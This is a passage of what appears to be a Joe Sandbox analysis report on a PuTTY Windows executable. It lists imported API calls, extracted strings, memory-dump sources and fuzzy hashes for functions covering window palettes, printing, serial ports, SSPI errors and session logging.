                    • CreatePalette.GDI32 ref: 00BB85A5
                    • SelectPalette.GDI32(00000000,00000000,00000000), ref: 00BB85C2
                    • RealizePalette.GDI32(00000000), ref: 00BB85C5
                    • GetStockObject.GDI32(0000000F), ref: 00BB85CD
                    • SelectPalette.GDI32(00000000,00000000,00000000), ref: 00BB85D7
                    • SetPaletteEntries.GDI32(?,?,?,?), ref: 00BB8635
                    • GetDC.USER32(00000000), ref: 00BB8647
                    • SelectPalette.GDI32(00000000,00000000), ref: 00BB865C
                    • UnrealizeObject.GDI32 ref: 00BB866A
                    • RealizePalette.GDI32(00000000), ref: 00BB8671
                    • GetStockObject.GDI32(0000000F), ref: 00BB8699
                    • SelectPalette.GDI32(00000000,00000000,00000000), ref: 00BB86A3
                    • ReleaseDC.USER32 ref: 00BB86B0
                    • InvalidateRect.USER32(00000000,00000001), ref: 00BB86D2
                    • ReleaseDC.USER32 ref: 00BB86E6
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID: Palette$Select$Object$RealizeReleaseStock$CapsCreateDeviceEntriesInvalidateRectUnrealize
                    • String ID: /home/simon/mem/.build/workdirs/bob-jmc5owxa/putty/windows/window.c$ncolours <= OSC4_NCOLOURS - start$start <= OSC4_NCOLOURS$wgs.term_hwnd
                    • API String ID: 3328073877-4099717352
                    • Opcode ID: b6c8b7ea1cd1889a496be109e6cbf4c698c39a610071eb7890ba4878ae1ed4f1
                    • Instruction ID: 91b6c9c6b7f83d78b1c3827bc6050d98da7f107f42da4502a9054d92635b077a
                    • Opcode Fuzzy Hash: b6c8b7ea1cd1889a496be109e6cbf4c698c39a610071eb7890ba4878ae1ed4f1
                    • Instruction Fuzzy Hash: 71514670604311AFE7216F64EC49FAE3BADEB1630AF1801A4FA47972A1DFB19840D764
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                      • Part of subcall function 00BEB850: LoadLibraryA.KERNELBASE(00000000,00000000,?,00BF99F0,kernel32.dll), ref: 00BEB86F
                    • GetProcAddress.KERNEL32(00000000,EnumPrintersA), ref: 00BEEEDB
                    • GetProcAddress.KERNEL32(00000000,OpenPrinterA), ref: 00BEEEE8
                    • GetProcAddress.KERNEL32(00000000,ClosePrinter), ref: 00BEEEF5
                    • GetProcAddress.KERNEL32(00000000,StartDocPrinterA), ref: 00BEEF02
                    • GetProcAddress.KERNEL32(00000000,EndDocPrinter), ref: 00BEEF0F
                    • GetProcAddress.KERNEL32(00000000,StartPagePrinter), ref: 00BEEF1C
                    • GetProcAddress.KERNEL32(00000000,EndPagePrinter), ref: 00BEEF29
                    • GetProcAddress.KERNEL32(00000000,WritePrinter), ref: 00BEEF36
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID: AddressProc$LibraryLoad
                    • String ID: ClosePrinter$EndDocPrinter$EndPagePrinter$EnumPrintersA$OpenPrinterA$StartDocPrinterA$StartPagePrinter$WritePrinter$spoolss.dll$winspool.drv
                    • API String ID: 2238633743-2130675966
                    • Opcode ID: 053f9f34dcf246aedcef3c82ec5be729e1035bf99eb6ab76be07fb4663fe668a
                    • Instruction ID: 3c081436eaacd0d3aa5899b8b36842ed43e0dde3e54835ea379d800457e35135
                    • Opcode Fuzzy Hash: 053f9f34dcf246aedcef3c82ec5be729e1035bf99eb6ab76be07fb4663fe668a
                    • Instruction Fuzzy Hash: 78111FB0A457D56EE701AF25AC0AB7FB7D4AB51714F0A0229F41096270EFB44B078B95
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                      • Part of subcall function 00BB5E50: _strlen.LIBCMT ref: 00BB5E61
                    • __fread_nolock.LIBCMT ref: 00BBAF51
                      • Part of subcall function 00BB5D40: DeleteObject.GDI32(00000000), ref: 00BB5D81
                      • Part of subcall function 00BB5D40: DestroyIcon.USER32(FFFFFFFF,00000000,?,?,00BBB151,00000001,?,?,?,?,?,00BB5BA6,?,00BB2A83), ref: 00BB5D90
                      • Part of subcall function 00BB5D40: DeleteObject.GDI32(?), ref: 00BB5DB8
                      • Part of subcall function 00BB5D40: CoUninitialize.OLE32(00000001,?,?,?,?,?,00BB5BA6,?,00BB2A83), ref: 00BB5DCD
                    Strings
                    • -cleanup, xrefs: 00BBAE04
                    • --host_ca, xrefs: 00BBAE7B
                    • -demo-terminal, xrefs: 00BBAEA3
                    • demo-server.example.com, xrefs: 00BBAFDC, 00BBB0C2
                    • %s expects input and output filenames, xrefs: 00BBAF92
                    • -demo-config-box, xrefs: 00BBAE91
                    • This procedure will remove ALL Registry entriesassociated with %s, and will also removethe random seed file. (This only affects thecurrently logged-in user.)THIS PROCESS WILL DESTROY YOUR SAVED SESSIONS.Are you really sure you want to continue?, xrefs: 00BBB04A
                    • unknown option "%s", xrefs: 00BBAEBF
                    • %s expects an output filename, xrefs: 00BBAF87
                    • unexpected argument "%s", xrefs: 00BBAF7C
                    • can't open input file '%s', xrefs: 00BBAF1F
                    • -pgpfp, xrefs: 00BBAE1A
                    • --host-ca, xrefs: 00BBAE4F
                    • option "%s" requires an argument, xrefs: 00BBADB1
                    • %s Warning, xrefs: 00BBB05A
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID: DeleteObject$DestroyIconUninitialize__fread_nolock_strlen
                    • String ID: %s Warning$%s expects an output filename$%s expects input and output filenames$--host-ca$--host_ca$-cleanup$-demo-config-box$-demo-terminal$-pgpfp$This procedure will remove ALL Registry entriesassociated with %s, and will also removethe random seed file. (This only affects thecurrently logged-in user.)THIS PROCESS WILL DESTROY YOUR SAVED SESSIONS.Are you really sure you want to continue?$can't open input file '%s'$demo-server.example.com$option "%s" requires an argument$unexpected argument "%s"$unknown option "%s"
                    • API String ID: 3701376555-528882638
                    • Opcode ID: 7b4c5ad2aa62801f736f8a382b4726be4059224f5cf8d4ab2e88222050afaff3
                    • Instruction ID: 8dfd5a35a35838f5bee8c063b8621caf26283365e844eb4089592a9ba6ea3783
                    • Opcode Fuzzy Hash: 7b4c5ad2aa62801f736f8a382b4726be4059224f5cf8d4ab2e88222050afaff3
                    • Instruction Fuzzy Hash: 8991F4A5E4424037EA2136206C87FFF36D88F6174AF5804F8FC0965283FBE5E95991A7
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • CreatePopupMenu.USER32 ref: 00BB644C
                    • AppendMenuA.USER32 ref: 00BB6481
                    • DeleteMenu.USER32(?,00000000), ref: 00BB65A5
                    • DeleteMenu.USER32(00000200,00000000), ref: 00BB65B4
                    • InsertMenuA.USER32(00000010,00000010,00000000,S&pecial Command), ref: 00BB65D2
                    • InsertMenuA.USER32(00000010,00000800,00000200,00000000), ref: 00BB65E8
                    • DeleteMenu.USER32(?,00000000), ref: 00BB6604
                    • DeleteMenu.USER32(00000200,00000000), ref: 00BB6613
                    • InsertMenuA.USER32(00000010,00000010,00000000,S&pecial Command), ref: 00BB6631
                    • InsertMenuA.USER32(00000010,00000800,00000200,00000000), ref: 00BB6647
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID: Menu$DeleteInsert$AppendCreatePopup
                    • String ID: /home/simon/mem/.build/workdirs/bob-jmc5owxa/putty/windows/window.c$IDM_SPECIAL_MIN + 0x10 * i < IDM_SPECIAL_MAX$S&pecial Command$nesting < 2
                    • API String ID: 1803796953-2735854202
                    • Opcode ID: bd33faf49b077e274f07e609f11f89a45a6f4f4ba2d6f3e7a194ca1ea156f17f
                    • Instruction ID: 304e701b90a2c1d2680b023f3c4f9b401c51ca9007863f92755224377fa4370a
                    • Opcode Fuzzy Hash: bd33faf49b077e274f07e609f11f89a45a6f4f4ba2d6f3e7a194ca1ea156f17f
                    • Instruction Fuzzy Hash: 7251F370B003086BE7245F18EC55F7E77E6EB94744F284569FA06AB2E1DEF1AC109B44
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • GetCommState.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000,00000000,00000000,00000000,00BDC140,?), ref: 00BDC34C
                    • SetCommState.KERNEL32(00000000,?), ref: 00BDC48F
                    • SetCommTimeouts.KERNEL32(00000000), ref: 00BDC4C4
                    • GetLastError.KERNEL32 ref: 00BDC4D3
                      • Part of subcall function 00BECC90: FormatMessageA.KERNEL32(00001200,00000000,?,00000400,?,0000FFFF,00000000,?,?,?,?,00BE69BE,?), ref: 00BECD1B
                      • Part of subcall function 00BECC90: _strlen.LIBCMT ref: 00BECD26
                    • GetLastError.KERNEL32 ref: 00BDC4EA
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID: Comm$ErrorLastState$FormatMessageTimeouts_strlen
                    • String ID: Configuring %s$Configuring %s flow control$Configuring %s parity$Configuring %u data bits$Configuring baud rate %lu$Configuring serial port: %s$Configuring serial timeouts: %s$DSR/DTR$Invalid number of stop bits (need 1, 1.5 or 2)$RTS/CTS$XON/XOFF
                    • API String ID: 617136254-604002008
                    • Opcode ID: 6a6b0670a6f712a0152c0d6949765ff728a9998e2b9206b4a9569dda53e888d4
                    • Instruction ID: bfeaf487e0d36951fbfb33b60e2668338f1a10a9b70d9c5b22e0dd529b96550b
                    • Opcode Fuzzy Hash: 6a6b0670a6f712a0152c0d6949765ff728a9998e2b9206b4a9569dda53e888d4
                    • Instruction Fuzzy Hash: FF41A3B1904342ABD700AF25EC56B2FBFE4AB55718F040479F949DA392F7358A148B92
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Strings
                    • No authority could be contacted for authentication.The domain name of the authenticating party could be wrong, the domain could be unreachable, or there might have been a trust relationship failure., xrefs: 00C00ED9
                    • Remote side closed network connection, xrefs: 00C012A6
                    • Remote side sent SSH2_MSG_EXT_INFO in bare connection protocol, xrefs: 00C012CB
                    • The handle passed to the function is invalid., xrefs: 00C00EAF
                    • One or more of the SecBufferDesc structures passed as an OUT parameter has a buffer that is too small., xrefs: 00C00E91
                    • Invalid packet length received, xrefs: 00C012B3
                    • The Local Security Authority cannot be contacted., xrefs: 00C00EBD
                    • The logon failed., xrefs: 00C00ECB
                    • The error is due to a malformed input token, such as a token corrupted in transit, a token of incorrect size, or a token passed into the wrong security package. Passing a token to the wrong package can happen if client and server did not negotiate the proper s, xrefs: 00C00EC4
                    • Internal SSPI error, xrefs: 00C00EA8
                    • The target was not recognized., xrefs: 00C00EB6
                    • Remote side unexpectedly closed network connection, xrefs: 00C012DA
                    • SSPI status OK, xrefs: 00C00E9F, 00C00EDE
                    • No credentials are available in the security package., xrefs: 00C00ED2
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID: _strlen
                    • String ID: Internal SSPI error$Invalid packet length received$No authority could be contacted for authentication.The domain name of the authenticating party could be wrong, the domain could be unreachable, or there might have been a trust relationship failure.$No credentials are available in the security package.$One or more of the SecBufferDesc structures passed as an OUT parameter has a buffer that is too small.$Remote side closed network connection$Remote side sent SSH2_MSG_EXT_INFO in bare connection protocol$Remote side unexpectedly closed network connection$SSPI status OK$The Local Security Authority cannot be contacted.$The error is due to a malformed input token, such as a token corrupted in transit, a token of incorrect size, or a token passed into the wrong security package. Passing a token to the wrong package can happen if client and server did not negotiate the proper s$The handle passed to the function is invalid.$The logon failed.$The target was not recognized.
                    • API String ID: 4218353326-2735777550
                    • Opcode ID: 001ad68f60710a558c83fb7b2f65fb84d225d5610abd14789dd3c4cfbf442d31
                    • Instruction ID: 1ac0b867323f451dfacc00ab72856da02f8e434e8a2b6bbfb3523a829afa8724
                    • Opcode Fuzzy Hash: 001ad68f60710a558c83fb7b2f65fb84d225d5610abd14789dd3c4cfbf442d31
                    • Instruction Fuzzy Hash: 4491CDB5900602AFDB04DF19D845B25FBB1FF04314F188669F85A9B792E331E9A4CBD1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • GetProcAddress.KERNEL32(00000000,GetSecurityInfo), ref: 00BEC206
                    • GetProcAddress.KERNEL32(00000000,SetSecurityInfo), ref: 00BEC22C
                    • GetProcAddress.KERNEL32(00000000,OpenProcessToken), ref: 00BEC252
                    • GetProcAddress.KERNEL32(00000000,GetTokenInformation), ref: 00BEC278
                    • GetProcAddress.KERNEL32(00000000,InitializeSecurityDescriptor), ref: 00BEC29A
                    • GetProcAddress.KERNEL32(00000000,SetSecurityDescriptorOwner), ref: 00BEC2B8
                    • GetProcAddress.KERNEL32(00000000,SetEntriesInAclA), ref: 00BEC2DB
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID: AddressProc
                    • String ID: GetSecurityInfo$GetTokenInformation$InitializeSecurityDescriptor$OpenProcessToken$SetEntriesInAclA$SetSecurityDescriptorOwner$SetSecurityInfo$advapi32.dll
                    • API String ID: 190572456-1260934078
                    • Opcode ID: edab6ffb613021c78560baf860f460659a81da9abdebe0bb09daa7c2ed536a6c
                    • Instruction ID: b570f3d8153efe40e968caad0230b48df233294832374fd6ab26173dbf814d05
                    • Opcode Fuzzy Hash: edab6ffb613021c78560baf860f460659a81da9abdebe0bb09daa7c2ed536a6c
                    • Instruction Fuzzy Hash: 3D314CB07403D2ABDF059F36EC49B1E3FE8B701344F488668E402D26A2DB74D541CB26
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Strings
                    • 0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ+/=, xrefs: 00C16795, 00C1682B
                    • MD5:, xrefs: 00C164A6
                    • 0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ+/, xrefs: 00C1648F
                    • 0123456789abcdefABCDEF:, xrefs: 00C164D4
                    • SHA256:, xrefs: 00C1647A
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID: _strspn$_strlen
                    • String ID: 0123456789abcdefABCDEF:$0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ+/$0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ+/=$MD5:$SHA256:
                    • API String ID: 937825679-3738422337
                    • Opcode ID: 27ffe0c55cd69c6c69c49948f7c14091b6f806ebc9b15a69f64bae7b36866ed5
                    • Instruction ID: 8d3db4183a0ecacadadde10f6af375a89902ecc6d9b48db4171cad3f9e8e3eab
                    • Opcode Fuzzy Hash: 27ffe0c55cd69c6c69c49948f7c14091b6f806ebc9b15a69f64bae7b36866ed5
                    • Instruction Fuzzy Hash: 1CC10680F043A227FF37411444253BAAADA5B87B4CF1D824BD095866C6CAA59FD7E3D3
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • RegisterClassA.USER32 ref: 00BD467F
                    • GetSysColor.USER32(00000018), ref: 00BD4693
                    • GetSysColor.USER32(00000017), ref: 00BD469C
                    • SystemParametersInfoA.USER32(00000029,00000158,00000158,00000000), ref: 00BD46CD
                    • CreateFontIndirectA.GDI32(?), ref: 00BD46DB
                    • SetWindowTextA.USER32(00000000,?), ref: 00BD4705
                    • CreateCompatibleDC.GDI32(00000000), ref: 00BD4719
                    • _strlen.LIBCMT ref: 00BD4722
                    • GetTextExtentPoint32A.GDI32(00000000,?,00000000,?), ref: 00BD4732
                    • DeleteDC.GDI32(00000000), ref: 00BD4739
                    • GetWindowRect.USER32 ref: 00BD4743
                    • CreateWindowExA.USER32 ref: 00BD478D
                    • ShowWindow.USER32(00000000,00000004), ref: 00BD479B
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID: Window$Create$ColorText$ClassCompatibleDeleteExtentFontIndirectInfoParametersPoint32RectRegisterShowSystem_strlen
                    • String ID: %dx%d
                    • API String ID: 816365731-2206825331
                    • Opcode ID: 1aab162344e559367c84d474e054221783f93c6f2a29dc64f63d3696ac8154c0
                    • Instruction ID: a434d4eaabc39ea11868359a0a7306e962bcd651b6b0632f804559021c1d249c
                    • Opcode Fuzzy Hash: 1aab162344e559367c84d474e054221783f93c6f2a29dc64f63d3696ac8154c0
                    • Instruction Fuzzy Hash: FF415CB1504300AFE714DF60DC49BAFBBF8EB89709F00491DF546972A0DB749948CB96
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • IsZoomed.USER32 ref: 00BBAA95
                    • IsZoomed.USER32 ref: 00BBAABC
                    • GetWindowLongA.USER32 ref: 00BBAACE
                    • GetWindowLongA.USER32 ref: 00BBAAE7
                    • SetWindowLongA.USER32 ref: 00BBAB19
                    • GetDesktopWindow.USER32 ref: 00BBAB70
                    • GetClientRect.USER32(00000000), ref: 00BBAB7A
                    • SetWindowPos.USER32(00000000,00000000,?,?,?,00000020), ref: 00BBABA1
                    • CheckMenuItem.USER32(00000180,00000008), ref: 00BBABC1
                    • CheckMenuItem.USER32(00000180,00000008), ref: 00BBABD0
                    Strings
                    • /home/simon/mem/.build/workdirs/bob-jmc5owxa/putty/windows/window.c, xrefs: 00BBAAA4
                    • (, xrefs: 00BBAB3B
                    • IsZoomed(wgs.term_hwnd), xrefs: 00BBAAA9
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID: Window$Long$CheckItemMenuZoomed$ClientDesktopRect
                    • String ID: ($/home/simon/mem/.build/workdirs/bob-jmc5owxa/putty/windows/window.c$IsZoomed(wgs.term_hwnd)
                    • API String ID: 4021424604-596742920
                    • Opcode ID: 8f3afbcea6e0591830785901a26036f210359777f9fabf5b9b7d58854c817497
                    • Instruction ID: 8bfdd1a47c25b4f740c73092745846c47bdb4d58748195c1f6b90dac17397723
                    • Opcode Fuzzy Hash: 8f3afbcea6e0591830785901a26036f210359777f9fabf5b9b7d58854c817497
                    • Instruction Fuzzy Hash: 00318BB0A04200AFDB14AF24EC4AF6E3BE4EB48714F144A18F856932B0EB70AC00DB56
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                      • Part of subcall function 00BF9440: GetLocalTime.KERNEL32(?,?,?,?,00BD4A24,?), ref: 00BF9456
                    • _strftime.LIBCMT ref: 00BD4CE8
                      • Part of subcall function 00BD5470: _strlen.LIBCMT ref: 00BD549D
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID: LocalTime_strftime_strlen
                    • String ID: %Y.%m.%d %H:%M:%S$%s session log (%s mode) to file: %s$/home/simon/mem/.build/workdirs/bob-jmc5owxa/putty/logging.c$=~=~=~=~=~=~=~=~=~=~=~= PuTTY log %s =~=~=~=~=~=~=~=~=~=~=~=$Appending$Disabled writing$Error writing$SSH raw data$Writing new$ctx->state != L_OPENING$unknown
                    • API String ID: 4241967358-3602227895
                    • Opcode ID: 730b0f5fa153b190d208e6c258b7f395dbaf248d133989b076eafceebf64b151
                    • Instruction ID: 67539a26e2600a2d41c829d6b58729fa9b23330f48f7441723e291a4ffe61131
                    • Opcode Fuzzy Hash: 730b0f5fa153b190d208e6c258b7f395dbaf248d133989b076eafceebf64b151
                    • Instruction Fuzzy Hash: 0341C8F59003045BDF24AB20DC86B6BB3E5EB85308F14497DE88A47342FB72AD58C752
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                      • Part of subcall function 00BEB9B0: RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,00000000), ref: 00BEBA26
                      • Part of subcall function 00BEB9B0: RegCloseKey.ADVAPI32(?), ref: 00BEBA6A
                    • GetProcAddress.KERNEL32(00000000,SHGetFolderPathA), ref: 00BE44E9
                      • Part of subcall function 00BE4AC0: CreateFileA.KERNEL32(00000000,80000000,00000000,00000000,00000000,00000000,00000000,00000002,00000000,?,00BE4659), ref: 00BE4AFB
                    • GetEnvironmentVariableA.KERNEL32(HOMEDRIVE,?,00000104), ref: 00BE45B3
                    • GetEnvironmentVariableA.KERNEL32(HOMEPATH,?,00000104), ref: 00BE45C6
                    • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00BE462E
                      • Part of subcall function 00BEBBF0: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,00BE4481,00000000,RandSeedFile), ref: 00BEBC17
                      • Part of subcall function 00BEBBF0: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000), ref: 00BEBC4F
                      • Part of subcall function 00BEBA90: RegCloseKey.ADVAPI32(00000000,00BE448C,00000000), ref: 00BEBA94
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID: CloseCreateEnvironmentQueryValueVariable$AddressDirectoryFileProcWindows
                    • String ID: HOMEDRIVE$HOMEPATH$RandSeedFile$SHGetFolderPathA$Software\SimonTatham\PuTTY$\PUTTY.RND$shell32.dll
                    • API String ID: 1153880102-1528239033
                    • Opcode ID: fc16f5a696c1dc49b1ec788e57b9d9b7f339852b6beea05771677837b6edafd8
                    • Instruction ID: 372cacddb51756f6c5be0655f7963370faac0a683adf3f34eb8ab2e7ee574f27
                    • Opcode Fuzzy Hash: fc16f5a696c1dc49b1ec788e57b9d9b7f339852b6beea05771677837b6edafd8
                    • Instruction Fuzzy Hash: 79511AB1B843842BFA2066666C4BF7B32D9CB55718F0804B4F94A973C2FFA599048297
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
